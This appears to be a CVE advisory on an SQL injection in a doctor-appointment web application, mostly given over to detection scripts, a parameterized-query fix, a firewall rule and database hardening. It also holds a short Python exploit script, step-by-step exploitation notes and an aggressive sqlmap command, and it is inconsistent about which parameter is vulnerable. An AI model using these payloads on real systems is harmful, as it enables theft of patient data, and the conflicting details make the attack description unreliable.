ProjectWorlds Online Doctor Appointment System, SQL Injection, CVE-2025-3184 (Critical)

How CVE-2025-3184 Works

The vulnerability exists in the patient profile module of ProjectWorlds Online Doctor Appointment Booking System 1.0. The `/patient/profile.php` endpoint fails to properly sanitize the user-supplied `patientFirstName` parameter when it handles requests that carry a patientId. This allows attackers to inject malicious SQL through crafted GET requests: the application concatenates the unsanitized input directly into its SQL statements, so the injected text is executed by the database. Attackers can exploit this to extract sensitive patient records, modify database content, or execute administrative operations. The flaw is remotely exploitable without authentication.

DailyCVE Form

Platform: ProjectWorlds Online Doctor
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 2025-04-15

What Undercode Say:

Exploitation:

```python
import requests
target = "http://target.com/patient/profile.php"
payload = "1' AND 1=CONVERT(int,(SELECT table_name FROM information_schema.tables))--"
response = requests.get(f"{target}?patientId={payload}")
print(response.text)
```

Detection:

```sql
-- Requests to the vulnerable endpoint whose patientId value carries a
-- URL-encoded single quote (%27)
SELECT * FROM logs
WHERE request_uri LIKE '%patient/profile.php%'
  AND query_string LIKE '%patientId=%27%';
```
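The log query above only catches a literal `%27`. The following scanner is an added example (not code from the advisory or from the ProjectWorlds project) that applies the same idea to raw access-log lines and goes a little further: it fully percent-decodes each value (so double-encoded probes such as `%2527` are caught), treats any non-integer `patientId` as suspicious because the id is an integer key, and inspects `patientFirstName` for SQL tokens while leaving a lone apostrophe alone so names like O'Brien are not flagged. The log format, the parameter names checked, and the sample lines are assumptions constructed for this example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache/nginx "combined" access-log format; only the fields used below are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# Tokens that never belong in a legitimate first name. A lone apostrophe is
# deliberately not listed: names such as O'Brien would otherwise raise alerts.
SQL_META_RE = re.compile(
    r"--|/\*|;|\bUNION\b|\bSELECT\b|\bSLEEP\b|\bBENCHMARK\b|\bOR\b\s+\S+\s*=",
    re.IGNORECASE,
)

VULNERABLE_PATH = "/patient/profile.php"  # endpoint named in the advisory


def fully_decode(value: str, rounds: int = 3) -> str:
    """Undo percent-encoding until the value stops changing (catches %2527 -> ')."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_request(target: str) -> list:
    """Return (param, decoded_value, reason) for each suspicious parameter in a request target."""
    parts = urlsplit(target)
    if not parts.path.endswith(VULNERABLE_PATH):
        return []
    findings = []
    params = parse_qs(parts.query, keep_blank_values=True)
    for raw in params.get("patientId", []):
        value = fully_decode(raw)
        # The id is an integer surrogate key, so anything else is a probe or a bug.
        if not re.fullmatch(r"[0-9]+", value):
            findings.append(("patientId", value, "non-integer id"))
    for raw in params.get("patientFirstName", []):
        value = fully_decode(raw)
        match = SQL_META_RE.search(value)
        if match:
            findings.append(("patientFirstName", value, f"SQL token {match.group(0)!r}"))
    return findings


def scan_access_log(lines) -> list:
    """Return one alert dict per suspicious parameter found in the given log lines."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        for param, value, reason in inspect_request(m.group("target")):
            alerts.append({
                "ip": m.group("ip"), "ts": m.group("ts"), "status": m.group("status"),
                "param": param, "value": value, "reason": reason,
            })
    return alerts


# Constructed sample log lines (not real traffic); addresses are from documentation ranges.
SAMPLE_LOG = [
    '203.0.113.5 - - [15/Apr/2025:10:01:22 +0000] "GET /patient/profile.php?patientId=42 HTTP/1.1" 200 1834 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [15/Apr/2025:10:02:03 +0000] "GET /patient/profile.php?patientId=1%27%20AND%201%3D1-- HTTP/1.1" 200 1834 "-" "curl/8.0"',
    '198.51.100.7 - - [15/Apr/2025:10:02:41 +0000] "GET /patient/profile.php?patientId=1%2527 HTTP/1.1" 500 512 "-" "python-requests/2.31"',
    '203.0.113.5 - - [15/Apr/2025:10:03:10 +0000] "GET /patient/profile.php?patientId=7&patientFirstName=O%27Brien HTTP/1.1" 200 1834 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [15/Apr/2025:10:03:55 +0000] "GET /patient/profile.php?patientId=7&patientFirstName=x%27%20UNION%20SELECT%201-- HTTP/1.1" 500 512 "-" "python-requests/2.31"',
    '203.0.113.5 - - [15/Apr/2025:10:04:20 +0000] "GET /doctor/list.php?patientId=1%27 HTTP/1.1" 200 700 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for alert in scan_access_log(SAMPLE_LOG):
        print(f"{alert['ts']} {alert['ip']} {alert['param']}={alert['value']!r} ({alert['reason']}, HTTP {alert['status']})")
```

Run against a real access log by replacing `SAMPLE_LOG` with the file's lines; the HTTP status is kept in each alert because a burst of 500s from one address on this endpoint is the usual sign that a probe found the unsanitized query.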

Mitigation:

```php
// Secure patched code: the id is validated as an integer and then bound as a
// prepared-statement parameter, so it is never concatenated into the SQL text
// (escaping is unnecessary once the value is bound).
$patientId = filter_input(INPUT_GET, 'patientId', FILTER_VALIDATE_INT);
if ($patientId === false || $patientId === null) {
    http_response_code(400);
    exit('invalid patientId');
}
$stmt = $conn->prepare("SELECT * FROM patients WHERE id = ?");
$stmt->bind_param("i", $patientId);
$stmt->execute();
$result = $stmt->get_result();
```
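To make the difference between the flawed concatenation and the patched parameterized query concrete, here is an added example in Python against an in-memory SQLite table; it is not the ProjectWorlds code, and the table, column names and rows are constructed for the demonstration. The vulnerable lookup pastes the GET value into the SQL text exactly as the advisory describes, while the hardened lookup validates the id and binds it as a parameter, mirroring the PHP fix above.

```python
import re
import sqlite3


def make_demo_db() -> sqlite3.Connection:
    """Constructed stand-in for the application's patients table (an assumption)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE patients (id INTEGER PRIMARY KEY, first_name TEXT, email TEXT)")
    conn.executemany(
        "INSERT INTO patients VALUES (?, ?, ?)",
        [(1, "Alice", "alice@example.invalid"),
         (2, "Bob", "bob@example.invalid"),
         (3, "Carol", "carol@example.invalid")],
    )
    conn.commit()
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, patient_id: str) -> list:
    """The flaw: the raw request parameter becomes part of the SQL text."""
    sql = "SELECT id, first_name FROM patients WHERE id = " + patient_id
    return conn.execute(sql).fetchall()


def lookup_hardened(conn: sqlite3.Connection, patient_id: str) -> list:
    """The fix: validate the integer key, then bind it; the engine sees data, not SQL."""
    if not re.fullmatch(r"[0-9]+", patient_id):
        raise ValueError("patientId must be a non-negative integer")
    sql = "SELECT id, first_name FROM patients WHERE id = ?"
    return conn.execute(sql, (int(patient_id),)).fetchall()


def hardened_rejects(conn: sqlite3.Connection, patient_id: str) -> bool:
    """True when the hardened lookup refuses the value before touching the database."""
    try:
        lookup_hardened(conn, patient_id)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_demo_db()
    print(lookup_vulnerable(db, "2"))         # one row, as intended
    print(lookup_vulnerable(db, "1 OR 1=1"))  # every row: the injected clause rewrote the WHERE
    print(lookup_hardened(db, "2"))           # one row
    print(hardened_rejects(db, "1 OR 1=1"))   # True: rejected, no query issued
```

The same value that turns the concatenated query into a full-table read is rejected outright by the hardened version, and even a value that passed validation would reach the engine only as a bound integer.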

WAF Rule:

```
SecRule ARGS_GET:patientId "@detectSQLi" "id:10001,deny,status:403,msg:'SQLi Attempt'"
```

Database Hardening:

```sql
-- Strip the web account down to the single privilege the endpoint needs
REVOKE ALL PRIVILEGES ON projectworlds.* FROM 'webuser'@'%';
GRANT SELECT ON projectworlds.patients TO 'webuser'@'%';
```

Exploit Analysis:

1. Send probe request with basic SQLi test: `patientId=1'--`
2. Identify parameter reflection in error messages
3. Craft UNION-based payload to extract schema
4. Exfiltrate data through time-based techniques if blind

Patch Verification:

```bash
curl -s "http://patched/system/version" | grep "1.0.1"
sqlmap -u "http://test.com/patient/profile.php?patientId=1" --level=5 --risk=3
```

Sources:

Reported By: nvd.nist.gov
Extra Source Hub: Undercode
